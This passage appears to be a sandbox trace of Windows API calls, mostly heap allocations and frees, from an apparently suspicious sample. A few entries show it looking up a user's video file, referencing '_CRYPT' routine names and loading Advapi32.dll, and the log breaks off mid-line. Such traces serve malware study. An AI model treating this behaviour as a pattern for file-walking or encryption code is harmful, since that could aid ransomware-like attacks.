[0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9888 [0107.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0107.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0107.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0107.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0107.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0107.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0107.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0107.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0107.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0107.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0107.780] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0107.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0107.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0107.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0107.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0107.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0107.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0107.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0107.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0107.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0107.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0107.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0107.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0107.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0107.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0107.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0107.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0107.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0107.783] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\Cu3r8FST64g6XD.flv", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb89a0da0, ftCreationTime.dwHighDateTime=0x1d5eeb6, ftLastAccessTime.dwLowDateTime=0xc72d3200, ftLastAccessTime.dwHighDateTime=0x1d5ec7e, ftLastWriteTime.dwLowDateTime=0xc72d3200, ftLastWriteTime.dwHighDateTime=0x1d5ec7e, nFileSizeHigh=0x0, nFileSizeLow=0x103a0, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Cu3r8FST64g6XD.flv", cAlternateFileName="CU3R8F~1.FLV")) returned 0x41ac2c0 [0107.783] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0107.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0107.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0107.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0107.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0107.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0107.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0107.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0107.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0107.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0107.784] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0107.784] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0107.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0107.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0107.784] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0107.784] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0107.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0107.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0107.784] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0107.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0107.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0107.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0107.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0107.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0107.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0107.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0107.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0107.785] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0107.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0107.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0107.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0107.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0107.785] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0107.786] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0107.786] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0107.786] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28c0 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0107.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0107.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0107.787] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.787] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0107.787] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0107.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0107.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0107.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.788] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 